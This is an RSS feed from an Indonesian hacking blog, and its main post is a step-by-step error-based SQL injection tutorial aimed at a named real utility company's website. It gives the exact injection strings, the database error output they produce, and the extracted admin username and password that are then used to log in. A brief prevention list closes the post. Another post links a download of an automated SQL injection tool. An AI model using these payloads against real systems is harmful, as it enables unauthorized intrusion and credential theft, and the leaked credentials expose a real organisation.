<?xml version="1.0" encoding="UTF-8"?>
<rss version="2.0"
	xmlns:content="http://purl.org/rss/1.0/modules/content/"
	xmlns:wfw="http://wellformedweb.org/CommentAPI/"
	xmlns:dc="http://purl.org/dc/elements/1.1/"
	xmlns:atom="http://www.w3.org/2005/Atom"
	xmlns:sy="http://purl.org/rss/1.0/modules/syndication/"
	xmlns:slash="http://purl.org/rss/1.0/modules/slash/"
	xmlns:georss="http://www.georss.org/georss" xmlns:geo="http://www.w3.org/2003/01/geo/wgs84_pos#" xmlns:media="http://search.yahoo.com/mrss/"
	>

<channel>
	<title>..:: [ † ] Gang11 [ † ] ::..</title>
	<atom:link href="http://gangdolly.wordpress.com/feed/" rel="self" type="application/rss+xml" />
	<link>http://gangdolly.wordpress.com</link>
	<description>We Are Nobody</description>
	<lastBuildDate>Fri, 06 Jan 2012 06:14:12 +0000</lastBuildDate>
	<language>id</language>
	<sy:updatePeriod>hourly</sy:updatePeriod>
	<sy:updateFrequency>1</sy:updateFrequency>
	<generator>http://wordpress.com/</generator>
<cloud domain='gangdolly.wordpress.com' port='80' path='/?rsscloud=notify' registerProcedure='' protocol='http-post' />
<image>
		<url>http://s2.wp.com/i/buttonw-com.png</url>
		<title>..:: [ † ] Gang11 [ † ] ::..</title>
		<link>http://gangdolly.wordpress.com</link>
	</image>
	<atom:link rel="search" type="application/opensearchdescription+xml" href="http://gangdolly.wordpress.com/osd.xml" title="..:: [ † ] Gang11 [ † ] ::.." />
	<atom:link rel='hub' href='http://gangdolly.wordpress.com/?pushpress=hub'/>
		<item>
		<title>SQL Injection, step by step</title>
		<link>http://gangdolly.wordpress.com/2010/02/07/sql-injection-step-by-step/</link>
		<comments>http://gangdolly.wordpress.com/2010/02/07/sql-injection-step-by-step/#comments</comments>
		<pubDate>Sun, 07 Feb 2010 10:57:32 +0000</pubDate>
		<dc:creator>MaDOnK</dc:creator>
				<category><![CDATA[Hacking Tutorial]]></category>

		<guid isPermaLink="false">http://gangdolly.wordpress.com/?p=27</guid>
		<description><![CDATA[/********************************************************* * SQL Injection, step by step. * * No Warranty. This tutorial is for educational use only, * commercial use is prohibited. * **********************************************************/ Akhir-akhir ini, anda sering mendengar istilah &#8220;SQL Injection&#8221; ? Anda tahu betapa berbahaya bug yang satu ini ? Berikut akan kita sajikan step by step SQL Injection ini. Catatan : [...]<img alt="" border="0" src="http://stats.wordpress.com/b.gif?host=gangdolly.wordpress.com&amp;blog=11629693&amp;post=27&amp;subd=gangdolly&amp;ref=&amp;feed=1" width="1" height="1" />]]></description>
			<content:encoded><![CDATA[<p>/*********************************************************<br />
 * SQL Injection, step by step.<br />
 *<br />
 * No Warranty. This tutorial is for educational use only,<br />
 * commercial use is prohibited.<br />
 *<br />
 **********************************************************/</p>
<p>Akhir-akhir ini, anda sering mendengar istilah &#8220;SQL Injection&#8221; ?<br />
Anda tahu betapa berbahaya bug yang satu ini ?<br />
Berikut akan kita sajikan step by step SQL Injection ini.<br />
Catatan : kita akan membatasi bahasan pada SQL Injection<br />
di MS-SQL Server.</p>
<p>Kita akan mengambil contoh di site www.pln-wilkaltim.co.id<br />
Ada dua kelemahan di site ini, yaitu:<br />
1. Tabel News<br />
2. Tabel Admin</p>
<p>Langkah pertama, kita tentukan lubang mana yang bisa di-inject<br />
dengan jalan berjalan-jalan (enumeration) dulu di site tsb.<br />
Kita akan menemukan 2 model cara input parameter, yaitu dengan<br />
cara memasukkan lewat input box dan memasukkannya lewat<br />
alamat URL.</p>
<p>Kita ambil yang termudah dulu, dengan cara input box.<br />
Kemudian kita cari kotak login yang untuk admin.<br />
Ketemu di www.pln-wilkaltim.co.id/sipm/admin/admin.asp<br />
Langkah pertama untuk menentukan nama tabel dan fieldnya,<br />
kita inject kotak NIP dengan perintah (password terserah, cabang<br />
biarkan aja):<br />
&#8216; having 1=1&#8211;<br />
jangan lupa untuk menuliskan tanda kutip tunggal dan tanda<br />
minus dobel (penting).<br />
Arti kedua tanda tsb bisa anda cari di tutorial SQL Injection<br />
di www.neoteker.or.id ini (lihat arsip sebelumnya).<br />
Kemudian akan keluar pesan error:<br />
&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8211;<br />
Microsoft OLE DB Provider for ODBC Drivers (0x80040E14)<br />
[Microsoft][ODBC SQL Server Driver][SQL Server]Column<br />
&#8216;T_ADMIN.NOMOR&#8217; is invalid in the select list because<br />
it is not contained in an aggregate function and<br />
there is no GROUP BY clause.<br />
/sipm/admin/dologin.asp, line 7<br />
&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8211;<br />
Keluarlah nama field pertama kita !!!<br />
Catat nama tabel : T_ADMIN<br />
Catat nama field : NOMOR</p>
<p>Kemudian kita akan mencari nama field-field berikutnya,<br />
beserta nama tabel yang mungkin berbeda-beda.<br />
Kita inject di kotak NIP (password terserah):<br />
&#8216; group by T_ADMIN.NOMOR having 1=1&#8211;<br />
Akan keluar pesan error:<br />
&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8211;<br />
Microsoft OLE DB Provider for ODBC Drivers (0x80040E14)<br />
[Microsoft][ODBC SQL Server Driver][SQL Server]Column<br />
&#8216;T_ADMIN.NIP&#8217; is invalid in the select list because<br />
it is not contained in either an aggregate<br />
function or the GROUP BY clause.<br />
/sipm/admin/dologin.asp, line 7<br />
&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8211;<br />
Artinya itulah nama tabel dan field kedua kita.<br />
Catat : T_ADMIN.NIP</p>
<p>Kemudian kita cari field ke tiga :<br />
&#8216; group by T_ADMIN.NOMOR,T_ADMIN.NIP having 1=1&#8211;<br />
Akan keluar pesan error:<br />
&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8211;<br />
Microsoft OLE DB Provider for ODBC Drivers (0x80040E14)<br />
[Microsoft][ODBC SQL Server Driver][SQL Server]Column<br />
&#8216;T_ADMIN.PASSWORD&#8217; is invalid in the select list because<br />
it is not contained in either an aggregate<br />
function or the GROUP BY clause.<br />
/sipm/admin/dologin.asp, line 7<br />
&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8211;<br />
Catat field ke tiga : T_ADMIN.PASSWORD</p>
<p>Lakukan langkah di atas sampai kita menemukan field terakhir.</p>
<p>Berikut adalah pesan error yang terjadi, jika kita mengecek<br />
field terakhir dengan meng-inject:<br />
&#8216; group by T_ADMIN.NOMOR,T_ADMIN.NIP,T_ADMIN.PASSWORD,<br />
T_ADMIN.NAMA,T_ADMIN.KD_RANTING,T_ADMIN.ADDRESS,T_ADMIN.EMAIL<br />
having 1=1&#8211;<br />
(catatan : kalimat harus 1 baris, tidak dipotong)<br />
&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8211;<br />
- NIP atau Password atau Unit Anda salah !!   -<br />
&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8211;<br />
Sukses !!! Kita berhasil menemukan field terakhir.<br />
Daftar kolom (field):<br />
T_ADMIN.NOMOR<br />
T_ADMIN.NIP<br />
T_ADMIN.PASSWORD<br />
T_ADMIN.NAMA<br />
T_ADMIN.KD_RANTING<br />
T_ADMIN.ADDRESS<br />
T_ADMIN.EMAIL<br />
Hanya ada satu tabel untuk otentifikasi ini (yaitu T_ADMIN),<br />
ini akan mempermudah proses kita selanjutnya.</p>
<p>Langkah berikutnya, kita menentukan jenis struktur field-<br />
field tersebut di atas.</p>
<p>Kita inject di kotak NIP (pass terserah) :<br />
&#8216; union select sum(NOMOR) from T_ADMIN&#8211;<br />
Arti dari query tersebut adalah : kita coba menerapkan<br />
klausa sum sebelum menentukan apakah jumlah kolom-kolom<br />
di dua rowsets adalah sejenis.<br />
Bahasa mudahnya adalah kita memasukkan klausa sum (jumlah)<br />
yang berlaku untuk type kolom numerik, jadi untuk type kolom<br />
yang bukan numerik, akan keluar error yang bisa memberitahu<br />
kita jenis kolom yang dimaksud.<br />
Pesan error :<br />
&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8211;<br />
Microsoft OLE DB Provider for ODBC Drivers (0x80040E14)<br />
[Microsoft][ODBC SQL Server Driver][SQL Server]All queries<br />
in an SQL statement containing a UNION operator must have<br />
an equal number of expressions in their target lists.<br />
/sipm/admin/dologin.asp, line 7<br />
&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8211;<br />
artinya kolom NOMOR berjenis numerik.</p>
<p>Berikutnya kita inject :<br />
&#8216; union select sum(NIP) from T_ADMIN&#8211;<br />
Akan keluar pesan error :<br />
&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8211;<br />
Microsoft OLE DB Provider for ODBC Drivers (0x80040E07)<br />
[Microsoft][ODBC SQL Server Driver][SQL Server]The sum<br />
or average aggregate operation cannot take a char data<br />
type as an argument.<br />
/sipm/admin/dologin.asp, line 7<br />
&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8211;<br />
Artinya kolom NIP bertype char.</p>
<p>Kita harus mengulang perintah di atas untuk kolom yang<br />
berikutnya dengan jalan mengganti nama_kolom di :<br />
&#8216; union select sum(nama_kolom) from T_ADMIN&#8211;<br />
dengan kolom yang berikutnya.<br />
Kita peroleh 7 type kolom:<br />
T_ADMIN.NOMOR =&gt; numeric<br />
T_ADMIN.NIP =&gt; char<br />
T_ADMIN.PASSWORD =&gt; nvarchar<br />
T_ADMIN.NAMA =&gt; char<br />
T_ADMIN.KD_RANTING =&gt; char<br />
T_ADMIN.ADDRESS =&gt; nvarchar<br />
T_ADMIN.EMAIL =&gt; char</p>
<p>Langkah berikutnya, kita akan mencari isi kolom password,<br />
untuk user admin, dengan meng-inject :<br />
&#8216; union select min(NAMA),1,1,1,1,1,1 from T_ADMIN where NAMA &gt; &#8216;a&#8217;&#8211;<br />
artinya kita memilih minimum nama user yang lebih besar dari &#8216;a&#8217;<br />
dan mencoba meng-konvert-nya ke tipe integer.<br />
Arti angka 1 sebanyak 6 kali itu adalah bahwa kita hanya memilih<br />
kolom NAMA, dan mengabaikan 6 kolom yang lain.<br />
Akan keluar pesan error :<br />
&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8211;<br />
Microsoft OLE DB Provider for ODBC Drivers (0x80040E07)<br />
[Microsoft][ODBC SQL Server Driver][SQL Server]Syntax<br />
error converting the varchar value &#8216;bill &#8216; to<br />
a column of data type int.<br />
/sipm/admin/dologin.asp, line 7<br />
&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8211;<br />
Anda lihat :<br />
varchar value &#8216;bill &#8216;<br />
&#8216;bill&#8217; itu adalah nama user di record yang terakhir dimasukkan,<br />
atau isi kolom NAMA di record yang terakhir dimasukkan.</p>
<p>Selanjutnya kita inject :<br />
&#8216; union select min(PASSWORD),1,1,1,1,1,1 from T_ADMIN where<br />
NAMA = &#8216;bill&#8217;&#8211;<br />
catatan : harus sebaris (tidak dipotong).<br />
Akan keluar error :<br />
&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;<br />
Microsoft OLE DB Provider for ODBC Drivers (0x80040E07)<br />
[Microsoft][ODBC SQL Server Driver][SQL Server]Syntax<br />
error converting the nvarchar value &#8216;m@mpusk@u&#8217; to a<br />
column of data type int.<br />
/sipm/admin/dologin.asp, line 7<br />
&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;<br />
Artinya kita berhasil !!!<br />
Kita dapatkan<br />
[+] NAMA = bill<br />
[+] PASSWORD = m@mpusk@u</p>
<p>Silahkan login ke :<br />
www.pln-wilkaltim.co.id/sipm/admin/admin.asp<br />
dengan account di atas, sedang nama cabang, silahkan anda<br />
isi sendiri dengan cara coba-coba</p>
<p>Atau kita pakai jalan pintas saja&#8230;.</p>
<p>Kita inject-kan :<br />
&#8216; union select min(KD_RANTING),1,1,1,1,1,1 from T_ADMIN<br />
where NAMA =&#8217;bill&#8217;&#8211;<br />
catatan : harus satu baris.<br />
Duarrrrrr&#8230;&#8230;&#8230;.<br />
Glhodhak&#8230;&#8230;&#8230;&#8230;.<br />
Langsung masuk ke menu admin.<br />
Ingat : jangan buat kerusakan ! beritahu sang admin !!!</p>
<p>Lubang ke dua adalah pada bagian berita.<br />
Pada dasarnya berita di situ adalah isi dari tabel yang<br />
lain lagi. Jadi tetep bisa kita inject !!!<br />
Bedanya, kita harus memasukkan parameter di alamat URL-nya.<br />
Contoh :<br />
www.pln-wilkaltim.co.id/dari_Media.asp?id=2119&amp;idm=40&amp;idSM=2<br />
ada parameter id dan idSM.<br />
Setelah kita coba inject, ternyata yang berpengaruh adalah<br />
parameter id aja (CMIIW).</p>
<p>Kita inject-kan :<br />
www.pln-wilkaltim.co.id/dari_Media.asp?id=2119&#8242; having 1=1&#8211;<br />
akan keluar pesan error :<br />
&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;<br />
Microsoft OLE DB Provider for ODBC Drivers (0x80040E14)<br />
[Microsoft][ODBC SQL Server Driver][SQL Server]Column<br />
&#8216;tb_news.NewsId&#8217; is invalid in the select list because<br />
it is not contained in an aggregate function and<br />
there is no GROUP BY clause.<br />
/dari_Media.asp, line 58<br />
&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;<br />
artinya &#8216;tb_news.NewsId&#8217; itulah nama tabel dan kolom kita<br />
yang pertama.</p>
<p>Ulangi langkah-langkah kita di atas sampai didapatkan :<br />
tb_news.NewsId =&gt; numeric<br />
tb_news.NewsCatId =&gt; numeric<br />
tb_news.EntryDate =&gt; datetime<br />
tb_news.Title =&gt; nvarchar<br />
tb_news.Content =&gt;<br />
tb_news.FotoLink =&gt;<br />
tb_news.FotoType =&gt; bit data<br />
tb_news.review =&gt;<br />
tb_news.sumber =&gt; char<br />
tb_news.dateagenda =&gt; datetime</p>
<p>Nah, selanjutnya adalah tugas anda sendiri untuk mengembangkan<br />
pengetahuan anda.<br />
Anda bisa men-insert berita yang bisa anda tentukan sendiri<br />
isinya.</p>
<p>Inilah mengapa hole di MS-SQL Server ini demikian berbahaya.</p>
<p>Perkiraan saya, nama-nama partai di situs KPU yang di-hack<br />
oleh Shizoprenic, juga ada di tabel-tabel suatu database,<br />
jadi tetep bisa dimasuki dengan cara SQL Injection ini.</p>
<p>******************************************************<br />
KHUSUS BUAT ADMIN &amp; WEB PROGRAMMER !!!<br />
******************************************************<br />
Cara pencegahan yang umum digunakan :<br />
1. Batasi panjang input box (jika memungkinkan), dengan<br />
cara membatasinya di kode program, jadi si cracker pemula<br />
akan bingung sejenak melihat input box nya gak bisa di<br />
inject dengan perintah yang panjang.<br />
2. Filter input yang dimasukkan oleh user, terutama penggunaan<br />
tanda kutip tunggal (Input Validation).<br />
3. Matikan atau sembunyikan pesan-pesan error yang keluar<br />
dari SQL Server yang berjalan.<br />
4. Matikan fasilitas-fasilitas standar seperti Stored Procedures,<br />
Extended Stored Procedures jika memungkinkan.<br />
5. Ubah &#8220;Startup and run SQL Server&#8221; menggunakan low privilege user<br />
di SQL Server Security tab.</p>
<p>Yah itulah mungkin yang dapat saya ceritakan&#8230;..<br />
Hal itu adalah gambaran, betapa tidak amannya dunia internet&#8230;<br />
Kalau mau lebih aman, copot kabel jaringan anda, copot disk<br />
drive anda, copot harddisk anda, jual kompie anda !!!<br />
Just kidding )</p>
<br />  <a rel="nofollow" href="http://feeds.wordpress.com/1.0/gocomments/gangdolly.wordpress.com/27/"><img alt="" border="0" src="http://feeds.wordpress.com/1.0/comments/gangdolly.wordpress.com/27/" /></a> <a rel="nofollow" href="http://feeds.wordpress.com/1.0/godelicious/gangdolly.wordpress.com/27/"><img alt="" border="0" src="http://feeds.wordpress.com/1.0/delicious/gangdolly.wordpress.com/27/" /></a> <a rel="nofollow" href="http://feeds.wordpress.com/1.0/gofacebook/gangdolly.wordpress.com/27/"><img alt="" border="0" src="http://feeds.wordpress.com/1.0/facebook/gangdolly.wordpress.com/27/" /></a> <a rel="nofollow" href="http://feeds.wordpress.com/1.0/gotwitter/gangdolly.wordpress.com/27/"><img alt="" border="0" src="http://feeds.wordpress.com/1.0/twitter/gangdolly.wordpress.com/27/" /></a> <a rel="nofollow" href="http://feeds.wordpress.com/1.0/gostumble/gangdolly.wordpress.com/27/"><img alt="" border="0" src="http://feeds.wordpress.com/1.0/stumble/gangdolly.wordpress.com/27/" /></a> <a rel="nofollow" href="http://feeds.wordpress.com/1.0/godigg/gangdolly.wordpress.com/27/"><img alt="" border="0" src="http://feeds.wordpress.com/1.0/digg/gangdolly.wordpress.com/27/" /></a> <a rel="nofollow" href="http://feeds.wordpress.com/1.0/goreddit/gangdolly.wordpress.com/27/"><img alt="" border="0" src="http://feeds.wordpress.com/1.0/reddit/gangdolly.wordpress.com/27/" /></a> <img alt="" border="0" src="http://stats.wordpress.com/b.gif?host=gangdolly.wordpress.com&amp;blog=11629693&amp;post=27&amp;subd=gangdolly&amp;ref=&amp;feed=1" width="1" height="1" />]]></content:encoded>
			<wfw:commentRss>http://gangdolly.wordpress.com/2010/02/07/sql-injection-step-by-step/feed/</wfw:commentRss>
		<slash:comments>0</slash:comments>
		<georss:point>0.000000 0.000000</georss:point>
		<geo:lat>0.000000</geo:lat>
		<geo:long>0.000000</geo:long>
		<media:content url="http://0.gravatar.com/avatar/e750d2cf106125aea4be3d5bbbef86e7?s=96&#38;d=http%3A%2F%2F0.gravatar.com%2Favatar%2Fad516503a11cd5ca435acc9bb6523536%3Fs%3D96&#38;r=G" medium="image">
			<media:title type="html">MaDOnK</media:title>
		</media:content>
	</item>
		<item>
		<title>Langkah Mengganti Logo Google dengan Nama Anda</title>
		<link>http://gangdolly.wordpress.com/2010/01/24/langkah-mengganti-logo-google-dengan-nama-anda/</link>
		<comments>http://gangdolly.wordpress.com/2010/01/24/langkah-mengganti-logo-google-dengan-nama-anda/#comments</comments>
		<pubDate>Sun, 24 Jan 2010 18:28:36 +0000</pubDate>
		<dc:creator>MaDOnK</dc:creator>
				<category><![CDATA[Hacking Tutorial]]></category>

		<guid isPermaLink="false">http://gangdolly.wordpress.com/?p=3</guid>
		<description><![CDATA[Siapa yang tak kenal dengan Google, mesin cari populer dengan latar halaman bernuansa putih sederhana plus logo &#8220;Google&#8221; di atas kotak mesin carinya. Jika Anda bosan dengan tampilan logo tersebut, Anda bisa membuat halaman seperti Google dengan nama Anda. Caranya sangat mudah. Cukup klik-klik saja logo dan style yang diinginkan, dalam sekejap Anda akan bisa [...]<img alt="" border="0" src="http://stats.wordpress.com/b.gif?host=gangdolly.wordpress.com&amp;blog=11629693&amp;post=3&amp;subd=gangdolly&amp;ref=&amp;feed=1" width="1" height="1" />]]></description>
			<content:encoded><![CDATA[<p>Siapa yang tak kenal dengan Google, mesin cari populer dengan latar halaman bernuansa putih sederhana plus logo &#8220;Google&#8221; di atas kotak mesin carinya.</p>
<p>Jika Anda bosan dengan tampilan logo tersebut, Anda bisa membuat halaman seperti Google dengan nama Anda. Caranya sangat mudah. Cukup klik-klik saja logo dan style yang diinginkan, dalam sekejap Anda akan bisa memiliki halaman mesin cari seperti Google dengan nama Anda. Simak langkahnya:</p>
<p>1. Buka situs <a href="http://www.funnylogo.info/create.asp" target="_blank">http://www.funnylogo.info/create.asp</a><br />
2. Masukan nama yang Anda inginkan pada situs tersebut.<br />
3. Tentukan style tulisan yang diinginkan, misal: Google Style.<br />
4. Klik &#8220;Create My Search Engine&#8221;.<br />
5. Setelah itu akan muncul tampilan &#8220;Situs Google&#8221; dengan logo yang kita inginkan.</p>
<p>Untuk membuat tampilan tersebut menjadi halaman default ketika Anda membuka browser, copy alamat yang tertera pada Address.</p>
<p>Untuk Browser Internet Explorer (IE):<br />
1. Klik menu Tools &#8211; Internet Options<br />
2. Pilih tab General, lalu ubah field Home Page dengan alamat tersebut.</p>
<p>Untuk Browser Mozila:<br />
1. Klik menu Tools &#8211; Options<br />
2. Pilih tab Main, lalu ubah field Home Page dengan alamat tersebut.<br />
3. Pada field When Firefox starts, pilih settingan Show my home page, lalu klik OK.</p>
<p>Setelah semua langkah dilakukan, Anda bisa mencoba membuka browser dan melihat hasilnya.</p>
<br />  <a rel="nofollow" href="http://feeds.wordpress.com/1.0/gocomments/gangdolly.wordpress.com/3/"><img alt="" border="0" src="http://feeds.wordpress.com/1.0/comments/gangdolly.wordpress.com/3/" /></a> <a rel="nofollow" href="http://feeds.wordpress.com/1.0/godelicious/gangdolly.wordpress.com/3/"><img alt="" border="0" src="http://feeds.wordpress.com/1.0/delicious/gangdolly.wordpress.com/3/" /></a> <a rel="nofollow" href="http://feeds.wordpress.com/1.0/gofacebook/gangdolly.wordpress.com/3/"><img alt="" border="0" src="http://feeds.wordpress.com/1.0/facebook/gangdolly.wordpress.com/3/" /></a> <a rel="nofollow" href="http://feeds.wordpress.com/1.0/gotwitter/gangdolly.wordpress.com/3/"><img alt="" border="0" src="http://feeds.wordpress.com/1.0/twitter/gangdolly.wordpress.com/3/" /></a> <a rel="nofollow" href="http://feeds.wordpress.com/1.0/gostumble/gangdolly.wordpress.com/3/"><img alt="" border="0" src="http://feeds.wordpress.com/1.0/stumble/gangdolly.wordpress.com/3/" /></a> <a rel="nofollow" href="http://feeds.wordpress.com/1.0/godigg/gangdolly.wordpress.com/3/"><img alt="" border="0" src="http://feeds.wordpress.com/1.0/digg/gangdolly.wordpress.com/3/" /></a> <a rel="nofollow" href="http://feeds.wordpress.com/1.0/goreddit/gangdolly.wordpress.com/3/"><img alt="" border="0" src="http://feeds.wordpress.com/1.0/reddit/gangdolly.wordpress.com/3/" /></a> <img alt="" border="0" src="http://stats.wordpress.com/b.gif?host=gangdolly.wordpress.com&amp;blog=11629693&amp;post=3&amp;subd=gangdolly&amp;ref=&amp;feed=1" width="1" height="1" />]]></content:encoded>
			<wfw:commentRss>http://gangdolly.wordpress.com/2010/01/24/langkah-mengganti-logo-google-dengan-nama-anda/feed/</wfw:commentRss>
		<slash:comments>0</slash:comments>
	
		<media:content url="http://0.gravatar.com/avatar/e750d2cf106125aea4be3d5bbbef86e7?s=96&#38;d=http%3A%2F%2F0.gravatar.com%2Favatar%2Fad516503a11cd5ca435acc9bb6523536%3Fs%3D96&#38;r=G" medium="image">
			<media:title type="html">MaDOnK</media:title>
		</media:content>
	</item>
		<item>
		<title>Pangolin – automatic sql injection tool</title>
		<link>http://gangdolly.wordpress.com/2010/01/24/pangolin/</link>
		<comments>http://gangdolly.wordpress.com/2010/01/24/pangolin/#comments</comments>
		<pubDate>Sun, 24 Jan 2010 17:05:08 +0000</pubDate>
		<dc:creator>MaDOnK</dc:creator>
				<category><![CDATA[Hacking Tools]]></category>

		<guid isPermaLink="false"></guid>
		<description><![CDATA[Pangolin merupakan software untuk melakukan Sql Injection secara automatic, alat uji keamanan ini di kembangkan oleh NOSEC. Tujuan nya sudah pasti  adalah untuk mendeteksi dan mengetahui kelemahan SQL injection pada aplikasi web Database Support Access: Informations (Database Path; Root Path; Drivers); Data MSSql: Informations; Data; FileReader; RegReader; FileWriter; Cmd; DirTree MySql: Informations; Data; FileReader; FileWriter; Oracle: Inforatmions (Version; [...]<img alt="" border="0" src="http://stats.wordpress.com/b.gif?host=gangdolly.wordpress.com&amp;blog=11629693&amp;post=1&amp;subd=gangdolly&amp;ref=&amp;feed=1" width="1" height="1" />]]></description>
			<content:encoded><![CDATA[<p>Pangolin merupakan software untuk melakukan Sql Injection secara automatic, alat uji keamanan ini di kembangkan oleh NOSEC. Tujuan nya sudah pasti  adalah untuk mendeteksi dan mengetahui kelemahan SQL injection pada aplikasi web</p>
<p style="text-align:center;">
<img class="aligncenter" src="http://gangdolly.files.wordpress.com/2010/01/pangolin.png?w=450" alt="" /><br />
<strong>Database Support</strong></p>
<ul>
<li>Access: Informations (Database Path; Root Path; Drivers); Data</li>
<li>MSSql: Informations; Data; FileReader; RegReader; FileWriter; Cmd; DirTree</li>
<li>MySql: Informations; Data; FileReader; FileWriter;</li>
<li>Oracle: Inforatmions (Version; IP; Database; Accounts ……); Data; and any others;</li>
<li>Informix: Informatons; Data</li>
<li>DB2: Informatons; Data; and more;</li>
<li>Sybase: Informatons; Data; and more;</li>
<li>PostgreSQL: Informatons; Data; FileReader;</li>
<li>Sqlite: Informatons; Data</li>
</ul>
<p style="text-align:center;"><a href="http://down2.nosec.org/pangolin_free_edition_2.5.2.975.rar"><strong>Download</strong></a></p>
<br />  <a rel="nofollow" href="http://feeds.wordpress.com/1.0/gocomments/gangdolly.wordpress.com/1/"><img alt="" border="0" src="http://feeds.wordpress.com/1.0/comments/gangdolly.wordpress.com/1/" /></a> <a rel="nofollow" href="http://feeds.wordpress.com/1.0/godelicious/gangdolly.wordpress.com/1/"><img alt="" border="0" src="http://feeds.wordpress.com/1.0/delicious/gangdolly.wordpress.com/1/" /></a> <a rel="nofollow" href="http://feeds.wordpress.com/1.0/gofacebook/gangdolly.wordpress.com/1/"><img alt="" border="0" src="http://feeds.wordpress.com/1.0/facebook/gangdolly.wordpress.com/1/" /></a> <a rel="nofollow" href="http://feeds.wordpress.com/1.0/gotwitter/gangdolly.wordpress.com/1/"><img alt="" border="0" src="http://feeds.wordpress.com/1.0/twitter/gangdolly.wordpress.com/1/" /></a> <a rel="nofollow" href="http://feeds.wordpress.com/1.0/gostumble/gangdolly.wordpress.com/1/"><img alt="" border="0" src="http://feeds.wordpress.com/1.0/stumble/gangdolly.wordpress.com/1/" /></a> <a rel="nofollow" href="http://feeds.wordpress.com/1.0/godigg/gangdolly.wordpress.com/1/"><img alt="" border="0" src="http://feeds.wordpress.com/1.0/digg/gangdolly.wordpress.com/1/" /></a> <a rel="nofollow" href="http://feeds.wordpress.com/1.0/goreddit/gangdolly.wordpress.com/1/"><img alt="" border="0" src="http://feeds.wordpress.com/1.0/reddit/gangdolly.wordpress.com/1/" /></a> <img alt="" border="0" src="http://stats.wordpress.com/b.gif?host=gangdolly.wordpress.com&amp;blog=11629693&amp;post=1&amp;subd=gangdolly&amp;ref=&amp;feed=1" width="1" height="1" />]]></content:encoded>
			<wfw:commentRss>http://gangdolly.wordpress.com/2010/01/24/pangolin/feed/</wfw:commentRss>
		<slash:comments>2</slash:comments>
		<georss:point>0.000000 0.000000</georss:point>
		<geo:lat>0.000000</geo:lat>
		<geo:long>0.000000</geo:long>
		<media:content url="http://0.gravatar.com/avatar/e750d2cf106125aea4be3d5bbbef86e7?s=96&#38;d=http%3A%2F%2F0.gravatar.com%2Favatar%2Fad516503a11cd5ca435acc9bb6523536%3Fs%3D96&#38;r=G" medium="image">
			<media:title type="html">MaDOnK</media:title>
		</media:content>

		<media:content url="http://gangdolly.files.wordpress.com/2010/01/pangolin.png" medium="image" />
	</item>
	</channel>
</rss>
